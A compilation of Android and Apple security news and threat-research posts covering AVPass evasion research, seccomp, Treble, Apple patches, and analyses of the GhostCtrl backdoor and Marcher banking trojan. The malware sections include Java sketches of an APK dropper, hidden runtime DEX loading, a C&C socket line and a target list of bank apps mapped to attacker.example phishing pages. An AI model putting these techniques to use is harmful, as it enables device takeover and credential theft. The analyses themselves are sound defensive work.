Antivirus for Android Has a Long, Long Way To Go

Antivirus programs on PCs have a mixed track record. While generally useful, they still have to play catch-up with evolving threats, and their deep system access has on occasion enabled even worse attacks. Now, as antivirus products gain popularity on Android devices, they appear to be making many of the same old mistakes.

A key part of the current shortcomings stems from the relative immaturity of Android antivirus offerings. Researchers at Georgia Tech who analyzed 58 mainstream options found that many were relatively easy to defeat, often because they didn’t take a nuanced and diverse approach to malware detection. Taking on the mindset of an attacker, the researchers built a tool called AVPass that works to smuggle malware onto a system without being detected by antivirus. Of the 58 programs tested, only two, from AhnLab and WhiteArmor, consistently stopped AVPass attacks.

“Antivirus for the mobile platform is really just starting for some companies—a lot of the antivirus for Android may even be their first iteration,” says Max Wolotsky, a PhD student at Georgia Tech who worked on the research. “We would definitely warn consumers that they should look into more than just AV. You want to be cautious.”

Modern antivirus uses machine-learning techniques to evolve with the malware field. So in creating AVPass, the researchers started by developing methods for defeating defensive algorithms they could access (like those created for academic research or other open-source projects) and then used these strategies as the basis for working out attacks against proprietary consumer antivirus—products where you can’t see the code powering them. The team will present on and release AVPass at the Black Hat hacking conference in Las Vegas on Thursday.

Free Pass

To test the 58 Android antivirus products and figure out which bypasses would work against each of them, the researchers used a service called VirusTotal, which identifies links and malware samples by scanning them through a system that incorporates dozens of tools and reports what each tool found. By querying VirusTotal with different malware components and seeing which tools flagged which samples, the researchers were able to form a picture of the types of detection features each antivirus uses. Under an academic license, VirusTotal limited the group to fewer than 300 queries per malware sample, but the researchers say even this small number was adequate for gathering data on how the different services go about detecting malware.
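For illustration, probing an online scanner in this way might look like the following minimal Java sketch against VirusTotal’s public v2 file-report endpoint; the API key and sample hash are placeholders, the JSON is returned raw, and this is not the AVPass code itself.

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLEncoder;

public class VirusTotalProbe {

    // Placeholder; a real key comes with a VirusTotal account.
    private static final String API_KEY = "YOUR_VT_API_KEY";

    // Fetches the per-engine scan report for a sample identified by its hash
    // and returns the raw JSON, which contains a "scans" map of engine -> verdict.
    static String fetchReport(String hash) throws Exception {
        String query = "apikey=" + URLEncoder.encode(API_KEY, "UTF-8")
                + "&resource=" + URLEncoder.encode(hash, "UTF-8");
        URL url = new URL("https://www.virustotal.com/vtapi/v2/file/report?" + query);

        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
        conn.setRequestMethod("GET");

        StringBuilder body = new StringBuilder();
        try (BufferedReader in = new BufferedReader(
                new InputStreamReader(conn.getInputStream(), "UTF-8"))) {
            String line;
            while ((line = in.readLine()) != null) {
                body.append(line);
            }
        }
        return body.toString();
    }

    public static void main(String[] args) throws Exception {
        // Placeholder hash; with a rate-limited license, results would be
        // cached locally rather than re-queried for every probe.
        System.out.println(fetchReport("d41d8cd98f00b204e9800998ecf8427e"));
    }
}

In practice, the researchers would submit many slightly different samples and compare the returned verdicts to infer which features each engine keys on.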

Before this reconnaissance, the team developed a feature for AVPass called Imitation Mode, which shields the test samples submitted for antivirus scanning so the snippets themselves wouldn’t be identified and blacklisted. “The Imitation Mode is for our malware obfuscation,” says Chanil Jeon, another researcher who worked on the project. “We extract particular malware features and insert them into an empty app, so we can test which feature or which combination is important for malware detection.” The team worked with mainstream malware samples from libraries like VirusShare.com and DREBIN.

AVPass is an open source prototype, part of broader Georgia Tech research into machine-learning algorithms (like those used in antivirus) and the extent to which they can be manipulated and exploited. But it also serves as commentary on the evolving landscape of mobile defense.

Room To Grow

If there’s a silver lining here, it’s that Android antivirus tools have an easier job than their PC equivalents, at least for now. "Android malware is not much of malware at all compared to PC malware," says Mohammad Mannan, a security researcher at Concordia University in Montreal who has studied antivirus vulnerabilities. "They are just rogue apps in most cases, so they are far easier to detect." And Mannan notes that though Android antivirus apps have a lot of leeway in the system, they aren’t as privileged as antivirus apps on PCs, which could potentially cut down on concerns that antivirus can sometimes be exploited as a security vulnerability in itself. "Mobile AVs run like a privileged app, but are still just an app in the end, not part of the operating system or kernel," he says.

For now, though, the potential advantages seem overshadowed by the immaturity of the market. The AVPass team says that Android antivirus developers need to build out their products so the programs are looking for multiple malicious attributes at once. It’s much easier to sneak past one security guard than 10. And they note that their research would have been much more difficult and time-consuming if tools like VirusTotal were less specific in the information they disclose about each service.

"These results aren’t the most surprising," Wolotsky says. "We knew going into this as security researchers that the mobile domain is much less advanced. We hope AVPass will give [antivirus developers] a way to see what works and what doesn’t, because I’m not sure they’ve had that."

from WIRED http://ift.tt/2ukl370

Seccomp filter in Android O

Posted by Paul Lawrence, Android Security Engineer

In Android-powered devices, the kernel does the heavy lifting to enforce the
Android security model. As the security team has worked to harden Android’s
userspace and isolate and deprivilege processes, the kernel has become the focus
of more security attacks. System calls are a common way for attackers to target
the kernel.

All Android software communicates with the Linux kernel using system calls, or
syscalls for short. The kernel provides many device- and SOC-specific syscalls
that allow userspace processes, including apps, to directly interact with the
kernel. All apps rely on this mechanism to access collections of behavior
indexed by unique system calls, such as opening a file or sending a Binder
message. However, many of these syscalls are not used or officially supported by
Android.

Android O takes advantage of a Linux feature called seccomp that
makes unused system calls inaccessible to application software. Because these
syscalls cannot be accessed by apps, they can’t be exploited by potentially
harmful apps.

seccomp filter

Android O includes a single seccomp filter installed into zygote, the process
from which all the Android applications are derived. Because the filter is
installed into zygote—and therefore all apps—the Android security team took
extra caution to not break existing apps. The seccomp filter allows:

  • all the syscalls exposed via bionic (the C runtime for Android). These are
    defined in bionic/libc/SYSCALLS.TXT.
  • syscalls to allow Android to boot
  • syscalls used by popular Android applications, as determined by running
    Google’s full app compatibility suite

Android O’s seccomp filter blocks certain syscalls, such as swapon/swapoff,
which have been implicated in some security attacks, and the key control
syscalls, which are not useful to apps. In total, the filter blocks 17 of 271
syscalls in arm64 and 70 of 364 in arm.

Developers

Test your app for illegal syscalls on a device running Android O.

Detecting an illegal syscall

In Android O, the system crashes an app that uses an illegal syscall. The log
printout shows the illegal syscall, for example:

03-09 16:39:32.122 15107 15107 I crash_dump32: performing dump of process 14942 (target tid = 14971)
03-09 16:39:32.127 15107 15107 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
03-09 16:39:32.127 15107 15107 F DEBUG   : Build fingerprint: 'google/sailfish/sailfish:O/OPP1.170223.013/3795621:userdebug/dev-keys'
03-09 16:39:32.127 15107 15107 F DEBUG   : Revision: '0'
03-09 16:39:32.127 15107 15107 F DEBUG   : ABI: 'arm'
03-09 16:39:32.127 15107 15107 F DEBUG   : pid: 14942, tid: 14971, name: WorkHandler  >>> com.redacted <<<
03-09 16:39:32.127 15107 15107 F DEBUG   : signal 31 (SIGSYS), code 1 (SYS_SECCOMP), fault addr --------
03-09 16:39:32.127 15107 15107 F DEBUG   : Cause: seccomp prevented call to disallowed system call 55
03-09 16:39:32.127 15107 15107 F DEBUG   :     r0 00000091  r1 00000007  r2 ccd8c008  r3 00000001
03-09 16:39:32.127 15107 15107 F DEBUG   :     r4 00000000  r5 00000000  r6 00000000  r7 00000037

Affected developers should rework their apps to not call the illegal syscall.

Toggling seccomp filters during testing

In addition to logging errors, the seccomp installer respects setenforce on
devices running userdebug and eng builds, which allows you to test whether
seccomp is responsible for an issue. If you type:

adb shell setenforce 0 && adb shell stop && adb shell start

then no seccomp policy will be installed into zygote. Because you cannot remove
a seccomp policy from a running process, you have to restart the shell for this
option to take effect.

Device manufacturers

Because Android O includes the relevant seccomp filters at
//bionic/libc/seccomp, device manufacturers don’t need to do any
additional implementation. However, there is a CTS test that checks for seccomp
at
//cts/tests/tests/security/jni/android_security_cts_SeccompTest.cpp.
The test checks that add_key and keyctl syscalls are
blocked and openat is allowed, along with some app-specific
syscalls that must be present for compatibility.

from Android Developers Blog http://ift.tt/2uexEqq

Apple hurls out patches for dozens of security holes in iOS, macOS

Apple has today released patches addressing roughly four dozen exploitable security vulnerabilities in iOS, macOS, and WatchOS.

The iOS 10.3.3 update resolves 47 flaws for the iPhone, iPad and iPod Touch, including multiple remote code execution holes in the WebKit browser engine. Fixes were also posted for the Apple Watch’s WatchOS firmware.

Of the CVE-listed flaws in the update, 23 were found in WebKit, the browser engine Apple uses for iOS and Safari. Those include 16 memory corruption errors that could be exploited for remote code execution via a malicious webpage.

One of those memory corruption bugs, CVE-2017-7055, was reported to Apple by the UK National Cyber Security Centre, a branch of the GCHQ spying nerve center. As usual, bug hunters with Google’s Project Zero were also well represented, with Ian Beer, lokihardt, and Ivan Fratric credited for discovering multiple flaws.

Other notable vulnerabilities include CVE-2017-7060, a bug in Safari Printing that allows an attacker to freeze the browser by flooding it with print dialogue boxes. Discovery of that bug was credited to Travis Kelley, with the City of Mishawaka, Indiana.

Also addressed were flaws that allow attackers to crash the Messages app (CVE-2017-7063), and bugs in the iOS kernel that allow an application to execute arbitrary code with kernel privileges or read restricted memory.

Meanwhile, Mac users will need to update their systems as well, thanks to a fresh crop of security fixes for macOS Sierra, OS X El Capitan, and OS X Yosemite. Those updates include fixes for a half-dozen CVE-listed vulnerabilities in the Intel Graphics Driver that allow applications to execute arbitrary code at the kernel level and view restricted memory addresses.

Also addressed were multiple flaws in the macOS kernel, and a bug in Broadcom Wi-Fi chips (CVE-2017-9417) affecting both iOS and macOS that allows an attacker to "execute arbitrary code on the Wi-Fi chip." That bug, also present on the Apple Watch and Apple TV, was credited to Nitay Artenstein of Exodus Intelligence.

A separate update for the Safari browser on macOS includes many of the WebKit fixes from the iOS update, including multiple remote code execution flaws that could be exploited via malicious webpages.

Moving on to the less-popular Apple products, watchOS and tvOS also received updates, as did the Windows versions of iTunes and iCloud, which include fixes for the WebKit remote code execution flaws.

In short, fire up your software update tool, download, install, reboot. ®

from The Register http://ift.tt/2u9KYwg

Shut the HAL Up

Posted by Jeff Vander Stoep, Senior Software Engineer, Android Security

Updates are essential for security, but they can be difficult and expensive for
device manufacturers. Project
Treble
is making updates easier by separating the underlying vendor
implementation from the core Android framework. This modularization allows
platform and vendor-provided components to be updated independently of each
other. While easier and faster updates are awesome, Treble’s increased
modularity is also designed to improve security.

Isolating HALs

A Hardware
Abstraction Layer
(HAL) provides an interface between device-agnostic code
and device-specific hardware implementations. HALs are commonly packaged as
shared libraries loaded directly into the process that requires hardware
interaction. Security boundaries are enforced at the process level. Therefore,
loading the HAL into a process means that the HAL is running in the same
security context as the process it’s loaded into.

The traditional method of running HALs in-process means that the process needs
all the permissions required by each in-process HAL, including direct access to
kernel drivers. Likewise, all HALs in a process have access to the same set of
permissions as the rest of the process, including permissions required by other
in-process HALs. This results in over-privileged processes and HALs that have
access to permissions and hardware that they shouldn’t.

Figure 1. Traditional method of multiple HALs in one process.

Moving HALs into their own processes better adheres to the principle of least privilege. This provides two distinct advantages:

  1. Each HAL runs in its own sandbox and is permitted access only to the hardware driver it controls, and the permissions granted to the process are limited to those required to do its job.

  2. Similarly, the process loses access to hardware drivers and other permissions and capabilities needed by the HALs.

Figure 2. Each HAL runs in its own process.

Moving HALs into their own processes is great for security, but it comes at the
cost of increased IPC overhead between the client process and the HAL. Improvements to the binder
driver
made IPC between HALs and clients practical. Introducing
scatter-gather into binder improves the performance of each transaction by
removing the need for the serialization/deserialization steps and reducing the
number of copy operations performed on data from three down to one. Android O
also introduces binder domains to provide separate communication streams for
vendor and platform components. Apps and the Android frameworks continue to use
/dev/binder, but vendor-provided components now use /dev/vndbinder.
Communication between the platform and vendor components must use /dev/hwbinder.
Other means of IPC between platform and vendor are disallowed.

Case study: System Server

Many of the services offered to apps by the core Android OS are provided by the
system server. As Android has grown, so have system server’s responsibilities and permissions, making it an attractive target for an attacker.
As part of project Treble, approximately 20 HALs were moved out of system
server, including the HALs for sensors, GPS, fingerprint, Wi-Fi, and more.
Previously, a compromise of any of those HALs would yield privileged system permissions; in Android O, permissions are restricted to the subset needed by the specific HAL.

Case study: media frameworks

Efforts to harden
the media stack
in Android Nougat continued in Android O. In Nougat,
mediaserver was split into multiple components to better adhere to the principle
of least privilege, with audio hardware access restricted to audioserver, camera
hardware access restricted to cameraserver, and so on. In Android O, most direct
hardware access has been removed from the media frameworks entirely. For example, the HALs for audio, camera, and DRM have been moved out of audioserver, cameraserver, and drmserver, respectively.

Reducing and isolating the attack surface of the kernel

The Linux kernel is the primary enforcer of the security model on Android.
Attempts to escape sandboxing mechanisms often involve attacking the kernel. An
analysis
of kernel vulnerabilities on Android showed that they overwhelmingly occurred in
and were reached through hardware drivers.

De-privileging system server and the media frameworks is important because they
interact directly with installed apps. Removing direct access to hardware
drivers makes bugs difficult to reach and adds another layer of defense to
Android’s security model.

from Android Developers Blog http://ift.tt/2veReTw

Android Backdoor GhostCtrl can Silently Record Your Audio, Video, and More

by Lenart Bermejo, Jordan Pan, and Cedric Pernet

The information-stealing RETADUP worm that affected Israeli hospitals is actually just part of an attack that turned out to be bigger than we first thought—at least in terms of impact. It was accompanied by an even more dangerous threat: an Android malware that can take over the device.

Detected by Trend Micro as ANDROIDOS_GHOSTCTRL.OPS / ANDROIDOS_GHOSTCTRL.OPSA, the malware is an Android backdoor we’ve named GhostCtrl, as it can stealthily control many of the infected device’s functionalities.

There are three versions of GhostCtrl. The first stole information and controlled some of the device’s functionalities without obfuscation, while the second added more device features to hijack. The third iteration combines the best of the earlier versions’ features—and then some. Based on the techniques each employed, we can only expect it to further evolve.

GhostCtrl is literally a ghost of itself
GhostCtrl is actually a variant of (or at least based on) the commercially sold, multiplatform OmniRAT that made headlines in November 2015. It touts that it can remotely take control of Windows, Linux, and Mac systems at the touch of an Android device’s button, and vice versa. A lifetime license for an OmniRAT package costs between US$25 and $75. Predictably, OmniRAT cracking tutorials abound in various underground forums, and some forum members even provide patchers for it.

There’s actually a red flag in the APK’s resources that shows the malicious APK is an OmniRAT spinoff (see Figure 1). Given that OmniRAT is sold as a service, this indicator can be modified (or removed) during compilation.


Figure 1: Snapshot of GhostCtrl version 3’s resources.arsc file indicating it’s an OmniRAT variant (highlighted)

GhostCtrl is hauntingly persistent
The malware masquerades as a legitimate or popular app, using names such as App, MMS, whatsapp, and even Pokemon GO. When the app is launched, it base64-decodes a string from its resource file and writes it to storage; that string is actually the malicious Android Application Package (APK).

The malicious APK, after being dynamically invoked by the wrapper APK, will ask the user to install it. Avoiding it is very tricky: even if the user cancels the “ask for install page” prompt, the message will still pop up immediately. The malicious APK doesn’t have an icon. Once installed, the wrapper APK launches a service that lets the main, malicious APK run in the background:


Figure 2: How the wrapper APK leads to the main APK
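The decode-and-prompt-to-install pattern described above is generic, and it boils down to something like the following hypothetical Java sketch; this is not GhostCtrl’s actual code, and the resource name, file location, and class names are assumptions.

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Base64;

import java.io.File;
import java.io.FileOutputStream;

public class WrapperActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        try {
            // Hypothetical: the payload is a base64 string bundled in
            // res/values/strings.xml of the wrapper app.
            String encoded = getString(R.string.payload_b64);
            byte[] apkBytes = Base64.decode(encoded, Base64.DEFAULT);

            // Write the decoded bytes out as an APK the installer can read.
            File apk = new File(getExternalFilesDir(null), "payload.apk");
            try (FileOutputStream out = new FileOutputStream(apk)) {
                out.write(apkBytes);
            }

            // Hand the APK to the system installer, which shows the
            // "ask for install" prompt described above. (On Android N and
            // later, a FileProvider content URI would be required instead
            // of Uri.fromFile.)
            Intent install = new Intent(Intent.ACTION_VIEW);
            install.setDataAndType(Uri.fromFile(apk),
                    "application/vnd.android.package-archive");
            install.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
            startActivity(install);
        } catch (Exception e) {
            // Error handling omitted in this sketch.
        }
    }
}

Note that the installation still requires the user to accept the prompt and to have allowed installs from unknown sources, which is why the malware nags repeatedly.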

The main APK has backdoor functions usually named com.android.engine to mislead the user into thinking it’s a legitimate system application. The malicious APK will then connect to the C&C server to retrieve commands via a socket (an endpoint for communication between machines): new Socket("hef–klife[.]ddns.net", 3176).

GhostCtrl can possess the infected device to do its bidding
The commands from the C&C server are encrypted and are decrypted locally by the APK upon receipt. Interestingly, we also found that the backdoor connects to a domain rather than directly to the C&C server’s IP address. This may be an attempt to obscure the traffic. We also found several dynamic DNS domains, which at some point resolved to the same C&C IP address:

  • hef–klife[.]ddns[.]net
  • f–klife[.]ddns[.]net
  • php[.]no-ip[.]biz
  • ayalove[.]no-ip[.]biz

A notable command contains an action code and Object DATA, which enable attackers to specify the target and content, making this a very flexible piece of malware for cybercriminals. This is the command that allows attackers to manipulate the device’s functionalities without the owner’s consent or knowledge.

Here’s a list of some of the action codes and what each does to the device:

  • ACTION CODE = 10, 11: Control the Wi-Fi state
  • ACTION CODE = 34: Monitor the phone sensors’ data in real time
  • ACTION CODE = 37: Set phone’s UiMode, like night mode/car mode
  • ACTION CODE = 41: Control the vibrate function, including the pattern and when it will vibrate
  • ACTION CODE = 46: Download pictures as wallpaper
  • ACTION CODE = 48: List the file information in the current directory and upload it to the C&C server
  • ACTION CODE = 49: Delete a file in the indicated directory
  • ACTION CODE = 50: Rename a file in the indicated directory
  • ACTION CODE = 51: Upload a desired file to the C&C server
  • ACTION CODE = 52: Create an indicated directory
  • ACTION CODE = 60: Use the text to speech feature (translate text to voice/audio)
  • ACTION CODE = 62: Send SMS/MMS to a number specified by the attacker; the content can also be customized
  • ACTION CODE = 68: Delete browser history
  • ACTION CODE = 70: Delete SMS
  • ACTION CODE = 74: Download file
  • ACTION CODE = 75: Call a phone number indicated by the attacker
  • ACTION CODE = 77: Open activity view-related apps; the Uniform Resource Identifier (URI) can also be specified by the attacker (open browser, map, dial view, etc.)
  • ACTION CODE = 78: Control the system infrared transmitter
  • ACTION CODE = 79: Run a shell command specified by the attacker and upload the output result

Another unique C&C command is an integer-type command, which is responsible for stealing the device’s data. Different kinds of sensitive—and to cybercriminals, valuable—information will be collected and uploaded, including call logs, SMS records, contacts, phone numbers, SIM serial number, location, and browser bookmarks.

The data GhostCtrl steals is extensive, compared to other Android info-stealers. Besides the aforementioned information types, GhostCtrl can also pilfer information like Android OS version, username, Wi-Fi, battery, Bluetooth, and audio states, UiMode, sensor, data from camera, browser, and searches, service processes, activity information, and wallpaper.

It can also intercept text messages from phone numbers specified by the attacker. Its most daunting capability is how it can surreptitiously record voice or audio, then upload the recording to the C&C server at a certain time. All the stolen content is encrypted before it’s uploaded to the C&C server.


Figure 3: Code snapshot showing how some information will be deleted after upload

Figure 4: Most of the related function codes for stealing information are in the “transfer” package.

The other C&C commands are self-defined, such as “account”, “audioManager”, and “clipboard”. These commands will trigger malicious routines. It’s worth noting that these aren’t commonly seen in Android RATs:

  • Clearing or resetting the password of an account specified by the attacker
  • Getting the phone to play different sound effects
  • Specifying the content of the clipboard
  • Customizing the notification and shortcut link, including the style and content
  • Controlling Bluetooth to search for and connect to another device
  • Setting accessibility to TRUE and terminating an ongoing phone call

How do GhostCtrl’s versions stack up against each other?
GhostCtrl’s first version has a framework that enables it to gain admin-level privileges. While the first version had no function codes, the second version did. The features it can hijack also increased incrementally as the malware evolved into its second and third iterations.


Figure 5: Framework of GhostCtrl’s first version for gaining admin-level privilege


Figure 6: Comparison of backdoor function of the first (left) and second (right) versions


Figure 7: Code snapshot of GhostCtrl’s second version applying device admin privileges

GhostCtrl’s second version can also act as mobile ransomware. It can lock the device’s screen and reset its password, and it can also root the infected device. It can hijack the camera, create a scheduled task for taking pictures or recording video, then surreptitiously upload them to the C&C server as mp4 files.


Figure 8: Code snapshot showing GhostCtrl’s ransomware-like capability


Figure 9: Code snapshot showing how GhostCtrl roots the infected device

The third version of GhostCtrl incorporates obfuscation techniques to hide its malicious routines, as shown below:


Figure 10: The attack chain of GhostCtrl’s third version

In GhostCtrl’s third version, the wrapper APK first drops a packed APK, which in turn unpacks the main APK, a Dalvik executable (DEX), and an Executable and Linkable Format (ELF) file. The DEX and ELF files decrypt strings and Application Programming Interface (API) calls in the main malicious APK at runtime. This long-winded attack chain makes detection more challenging, exacerbated by the fact that the wrapper APK hides the packed APK, as well as the DEX and ELF files, in the assets directory.
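Runtime loading of a dropped DEX file is normally done with Android’s DexClassLoader; the hypothetical sketch below illustrates the general technique only (the dropped file, class, and method names are assumptions, and this is not GhostCtrl’s actual unpacking code).

import android.content.Context;

import java.io.File;
import java.lang.reflect.Method;

import dalvik.system.DexClassLoader;

public class RuntimeLoader {

    // Loads a DEX file that was unpacked at runtime and invokes an entry
    // point in it by reflection, so the code never appears in the wrapper
    // APK's own classes and is harder for static scanners to see.
    static void loadAndRun(Context context, File droppedDex) throws Exception {
        File optimizedDir = context.getDir("odex", Context.MODE_PRIVATE);

        DexClassLoader loader = new DexClassLoader(
                droppedDex.getAbsolutePath(),    // dropped .dex or .apk
                optimizedDir.getAbsolutePath(),  // cache for optimized dex
                null,                            // no extra native lib path
                context.getClassLoader());       // parent class loader

        // Hypothetical class and method names inside the dropped DEX.
        Class<?> entry = loader.loadClass("com.example.payload.Main");
        Method start = entry.getMethod("start", Context.class);
        start.invoke(null, context); // assumes a static entry point
    }
}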

Mitigation
GhostCtrl’s combination with an information-stealing worm, while potent, is also telling. The attackers tried to cover their bases, and made sure that they didn’t just infect endpoints. And with the ubiquity of mobile devices among corporate and everyday end users, GhostCtrl’s capabilities can indeed deliver the scares.

But more than its impact, GhostCtrl underscores the importance of defense in depth. Multilayered security mechanisms should be deployed so that the risks to data are better managed. Some of the best practices that information security professionals and IT/system administrators can adopt to secure bring-your-own devices (BYOD) include:

  • Keep the device updated; Android patching is fragmented and organizations may have custom requirements or configurations needed to keep the device updated, so enterprises need to balance productivity and security
  • Apply the principle of least privilege—restrict user permissions for BYOD devices to prevent unauthorized access and installation of dubious apps
  • Implement an app reputation system that can detect and block malicious and suspicious apps
  • Deploy firewalls, intrusion detection, and prevention systems at both the endpoint and mobile device levels to preempt the malware’s malicious network activities
  • Enforce and strengthen your mobile device management policies to further reduce potential security risks
  • Employ encryption, network segmentation and data segregation to limit further exposure or damage to data
  • Regularly back up data in case of device loss, theft, or malicious encryption

 

Trend Micro Solutions
End users and enterprises can also benefit from multilayered mobile security solutions such as Trend Micro Mobile Security for Android™, which is also available on Google Play.

Trend Micro Mobile Security for Enterprise provides device, compliance, and application management, data protection, and configuration provisioning. It also protects devices from attacks that leverage vulnerabilities, prevents unauthorized access to apps, and detects and blocks malware and fraudulent websites.

A list of all the hashes (SHA-256) detected as ANDROIDOS_GHOSTCTRL.OPS/ANDROIDOS_GHOSTCTRL.OPSA is in this appendix.


from TrendLabs Security Intelligence Blog http://ift.tt/2uqod9X

New Android Marcher Variant Posing as Adobe Flash Player Update

Introduction

Marcher is sophisticated banking malware that steals users’ financial information, such as online banking credentials and credit card details. We have observed Marcher evolving over time, using new tricks and payload delivery mechanisms. As we have reported in previous write-ups on this malware, its authors keep adopting new techniques to spread infections, such as pornographic lures and the hype around new games.

In a recent wave, we are seeing the malware payloads disguised as an Adobe Flash Player update. Upon opening the dropper URL, the user is shown a message saying the device’s Flash Player is out of date, and the malware “Adobe_Flash_2016.apk” is dropped onto the device. The malware also guides the user to disable security settings and allow installation of third-party apps, as shown in the screen below.

Fig 1: Payload delivery

We saw multiple payloads being served, with popcash.net ads as the initial source of infection.

Fig 2: New Android Marcher wave

Upon installation, the malware quickly hides and removes its icon from the phone menu.

Following infection, the malware registers the infected device with its Command & Control (C&C) server. Along with the device’s meta information, the list of installed apps is sent to the C&C server, as shown below.

Fig 3: C&C communication
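Enumerating installed packages needs no special permission on Android; the kind of app-list collection described above can be approximated by this minimal, hypothetical Java sketch.

import android.content.Context;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageManager;

import java.util.ArrayList;
import java.util.List;

public class InstalledApps {

    // Returns the package names of every installed application; this is
    // the kind of inventory a bot can send home without any permission.
    static List<String> listPackages(Context context) {
        PackageManager pm = context.getPackageManager();
        List<String> names = new ArrayList<>();
        for (ApplicationInfo info : pm.getInstalledApplications(0)) {
            names.add(info.packageName);
        }
        return names;
    }
}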

 
After a few sleep cycles, the malware waits for the user to open an app from its targeted list. We found that this variant is capable of targeting over 40 financial apps. When the user opens any of the targeted apps, the malware will quickly overlay a fake login page, which lures the victim into supplying user credentials. Some of the overlay pages are shown below.

Fig 4: Fake login pages
 
Unlike Marcher samples we’ve seen in the past, this variant maintains a JavaScript Object Notation (JSON) file that lists each targeted app and the URL hosting its fake login page. This list is hardcoded in the malware payload. A screen capture is shown below.

Fig 5: Targeted apps list with the associated URLs that serve the overlay pages
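The structure is essentially a map from a targeted package name to the URL serving its overlay page. The following hypothetical Java sketch shows such a layout being parsed with Android’s bundled org.json classes; the field names and URLs are illustrative assumptions, not the actual Marcher configuration.

import org.json.JSONArray;
import org.json.JSONException;
import org.json.JSONObject;

import java.util.HashMap;
import java.util.Map;

public class TargetList {

    // Hypothetical layout: each entry pairs a targeted package name with
    // the URL that serves its fake login overlay.
    static final String SAMPLE_JSON = "["
            + "{\"pkg\":\"com.chase.sig.android\",\"overlay\":\"http://attacker.example/chase.html\"},"
            + "{\"pkg\":\"com.paypal.android.p2pmobile\",\"overlay\":\"http://attacker.example/paypal.html\"}"
            + "]";

    // Parses the list into a package-name -> overlay-URL map.
    static Map<String, String> parse(String json) throws JSONException {
        Map<String, String> targets = new HashMap<>();
        JSONArray entries = new JSONArray(json);
        for (int i = 0; i < entries.length(); i++) {
            JSONObject entry = entries.getJSONObject(i);
            targets.put(entry.getString("pkg"), entry.getString("overlay"));
        }
        return targets;
    }
}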

The following is a list of apps targeted by the new Marcher variant, mostly financial apps along with popular email, social, and shopping apps:

  • com.android.vending
  • org.morgbigorg.nonem
  • com.google.android.gm
  • com.yahoo.mobile.client.android.mail
  • com.htc.android.mail
  • com.android.email
  • com.paypal.android.p2pmobile
  • com.chase.sig.android
  • com.suntrust.mobilebanking
  • com.wf.wellsfargomobile
  • com.citi.citimobile
  • com.konylabs.capitalone
  • com.infonow.bofa
  • com.morganstanley.clientmobile.prod
  • com.amazon.mShop.android.shopping
  • com.htsu.hsbcpersonalbanking
  • com.usaa.mobile.android.usaa
  • com.schwab.mobile
  • com.americanexpress.android.acctsvcs.us
  • com.pnc.ecommerce.mobile
  • com.regions.mobbanking
  • com.clairmail.fth
  • com.grppl.android.shell.BOS
  • com.tdbank
  • com.huntington.m
  • com.citizensbank.androidapp
  • com.usbank.mobilebanking
  • com.key.android
  • com.ally.MobileBanking
  • com.unionbank.ecommerce.mobile.android
  • com.mfoundry.mb.android.mb_BMOH071025661
  • com.bbt.cmol
  • com.sovereign.santander
  • com.mtb.mbanking.sc.retail.prod
  • com.fi9293.godough
  • com.circle.android
  • com.coinbase.android
  • com.walmart.android
  • com.bestbuy.android
  • com.gyft.android
  • com.commbank.netbank
  • org.westpac.bank
  • au.com.nab.mobile
  • org.stgeorge.bank
  • com.facebook.katana
  • com.moneybookers.skrillpayments
  • com.westernunion.android.mtapp
  • au.com.ingdirect.android
  • au.com.bankwest.mobile
  • org.banksa.bank
  • com.ebay.mobile
  • com.ebay.gumtree.au
  • com.anz.android.gomoney
  • com.anz.android

Unlike other Marcher malware, this variant is highly obfuscated, which explains the low antivirus (AV) detection rate. The VirusTotal screen capture below shows that less than 20 percent of AV scanners detected the new variant (at the time of the scan).

VT: 11/59 (at the time of analysis)

Fig 6: VT detection

 

Fig 7: Obfuscated code
 
The overlay (fake) login pages for the financial apps are hosted remotely, allowing the author to update them as needed. In the sample C&C communication shown below, the user on the infected device tries to launch the Commonwealth Bank of Australia app; it gets intercepted by the Marcher Trojan, which loads an overlay login page from a remote location.

Fig 8: Serving fake page in server response

If the user falls for the fake login page and enters his or her banking credentials, the Marcher Trojan relays the information to the C&C server, as shown in the screenshot below.

Fig 9: Credential harvesting

Conclusion

We have been seeing regular infection attempts for this Marcher variant in the past month. The frequent changes in the Marcher family indicate that the malware remains an active and prevalent threat to Android devices.

To avoid becoming a victim of such malware, be sure to download apps only from trusted app stores, such as Google Play. By unchecking the “Unknown Sources” option under the “Security” settings of your device, you can prevent the inadvertent installation of apps from questionable sources.
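As a defensive illustration, the minimal Java sketch below checks whether a device currently allows installs from unknown sources. The relevant setting has moved across Android releases, so the sketch consults the legacy global flag on older versions and the per-app API introduced in Android O; it is an assumption-based example, not code from any product discussed here.

import android.content.Context;
import android.os.Build;
import android.provider.Settings;

public class UnknownSourcesCheck {

    // Returns true if the device (or, on Android O and later, this app)
    // currently allows installing packages from outside Google Play.
    static boolean unknownSourcesAllowed(Context context) {
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
            // Android O replaces the global toggle with a per-app permission;
            // requires REQUEST_INSTALL_PACKAGES to be declared in the manifest.
            return context.getPackageManager().canRequestPackageInstalls();
        }
        // Earlier releases: global setting, 1 means "Unknown Sources" is on.
        return Settings.Global.getInt(context.getContentResolver(),
                Settings.Global.INSTALL_NON_MARKET_APPS, 0) == 1;
    }
}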

Zscaler ThreatLabZ is actively monitoring Android Marcher and its variants to ensure that Zscaler customers are protected.

Indicators of compromise (IOCs):

Dropper URLs

C&Cs:

from Zscaler Research http://ift.tt/2sZpapF

Report Reveals In-App Purchase Scams in the App Store

An investigation into App Store developer pay-outs has uncovered a scamming trend in which apps advertising fake services are making thousands of dollars a month from in-app purchases.

In a Medium article titled How to Make $80,000 Per Month on the Apple App Store, Johnny Lin describes how he discovered the trend, which works by manipulating search ads to promote dubious apps in the App Store and then preying on unsuspecting users via the in-app purchase mechanism.

I scrolled down the list in the Productivity category and saw apps from well-known companies like Dropbox, Evernote, and Microsoft. That was to be expected. But what’s this? The #10 Top Grossing Productivity app (as of June 7th, 2017) was an app called "Mobile protection :Clean & Security VPN".

